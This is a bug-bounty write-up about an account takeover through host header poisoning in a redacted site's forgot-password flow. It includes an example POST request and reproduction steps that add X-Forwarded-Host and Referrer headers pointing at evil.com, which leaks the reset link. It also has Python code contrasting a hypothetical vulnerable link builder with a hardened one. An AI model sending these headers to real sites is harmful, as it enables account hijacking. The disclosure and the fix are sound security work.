ATO via Host Header Poisoning
Hello Everyone (Ram Ram Ji),
This article is about an account-takeover bug found through host header poisoning. Redacted.com was vulnerable to host header injection in its forgot-password flow: a remote attacker could make the link in the password-reset email point to a host they control, and so take over any account on redacted.com.
Attacking Scenario:
As an attacker, I modified the POST request sent by the forgot-password form. First I changed the value of the Host header to evil.com, but nothing happened. Then I added an X-Forwarded-Host header with the value evil.com; again nothing happened. On my third attempt I also changed the value of the Referrer header, setting it to the same value as X-Forwarded-Host, and that worked.
The request looked like this (the standard HTTP header name is Referer; the spelling below is kept as it appears in the report):
POST /forgot HTTP/1.1
Host: redacted.com
X-Forwarded-Host: evil.com
Referrer: https://evil.com

username=<username>&_csrf_token=5905477eb5efbc742cb051b922df433a775ae92e
After sending the request I received the email, and the link in it used evil.com as its host.
Steps to Reproduce (as given in the report):
1. Navigate to "https://redacted.com/forgot".
2. Enter your username and intercept the request with the help of Burp Suite.
3. Add these two headers to the POST request:
X-Forwarded-Host: evil.com
Referrer: https://evil.com
4. Forward the request and check the email that is linked with your username.
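To show why the third attempt worked while the first two did not, and what the fix looks like, here is an added example that models the server side. It is not redacted.com's code and the page does not reveal the real logic; the vulnerable builder is one hypothesis consistent with the three attempts above (a virtual-host check that only looks at Host, and an X-Forwarded-Host that is honoured only when the Referer origin agrees with it), and the canonical origin, header names and token value are assumptions. The hardened builder takes the link origin from configuration and uses request headers only to reject traffic for the wrong host.

```python
from urllib.parse import urlsplit

# Assumption: the application's canonical origin comes from configuration,
# never from the incoming request.
CANONICAL_ORIGIN = "https://redacted.com"
CANONICAL_HOST = urlsplit(CANONICAL_ORIGIN).hostname  # "redacted.com"


def _header(headers, name):
    """Case-insensitive lookup of one header; None when absent."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def _hostname(value):
    """Strip an optional :port from a Host-style value."""
    return value.split(":", 1)[0].lower()


def _check_vhost(headers):
    """Reject requests whose Host is not the configured host (attempt 1)."""
    host = _header(headers, "Host")
    if host is None or _hostname(host) != CANONICAL_HOST:
        raise ValueError(f"request rejected, unexpected Host: {host!r}")
    return host


def vulnerable_reset_link(headers, token):
    """Hypothetical vulnerable builder. The virtual-host check only looks at
    Host, so Host: evil.com is rejected. X-Forwarded-Host is honoured only
    when the Referer's origin matches it, a "consistency" check in which the
    attacker controls both halves (attempts 2 and 3)."""
    host = _check_vhost(headers)
    forwarded = _header(headers, "X-Forwarded-Host")
    # The report sent "Referrer"; the standard header name is "Referer".
    referer = _header(headers, "Referer") or _header(headers, "Referrer")
    if forwarded and referer and urlsplit(referer).hostname == _hostname(forwarded):
        host = forwarded
    return f"https://{host}/reset?token={token}"


def hardened_reset_link(headers, token):
    """Hardened builder: the link origin is configuration. Request headers are
    used only to reject traffic for the wrong virtual host, never to build URLs."""
    _check_vhost(headers)
    return f"{CANONICAL_ORIGIN}/reset?token={token}"


# Constructed requests mirroring the three attempts described above.
ATTEMPTS = {
    "host_only": {"Host": "evil.com"},
    "xfh_only": {"Host": "redacted.com", "X-Forwarded-Host": "evil.com"},
    "xfh_and_referer": {
        "Host": "redacted.com",
        "X-Forwarded-Host": "evil.com",
        "Referrer": "https://evil.com",
    },
}


def link_host(builder, headers, token="t0k3n"):
    """Host that the reset email would link to, or 'rejected'."""
    try:
        return urlsplit(builder(headers, token)).hostname
    except ValueError:
        return "rejected"


def run_attempts():
    """Outcome of each attempt against both builders."""
    return {
        name: {
            "vulnerable": link_host(vulnerable_reset_link, headers),
            "hardened": link_host(hardened_reset_link, headers),
        }
        for name, headers in ATTEMPTS.items()
    }


if __name__ == "__main__":
    for name, result in run_attempts().items():
        print(f"{name:16} vulnerable -> {result['vulnerable']:13} hardened -> {result['hardened']}")
```

When reproducing against a real target, send both the `Referer` and `Referrer` spellings, since only the former is the standard header and a server may read either; and note that the hardened version makes the poisoned headers irrelevant rather than trying to validate them, which is the fix to ask for in a report.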
Timeline:
June 26, 2019 — Reported to private program
August 01, 2019 — Report Triaged
August 08, 2019 — Bounty of $2000 USD awarded
October 24, 2019 — Vulnerability fixed
Special thanks to nullr3x (Big Bad Brother 🤑 )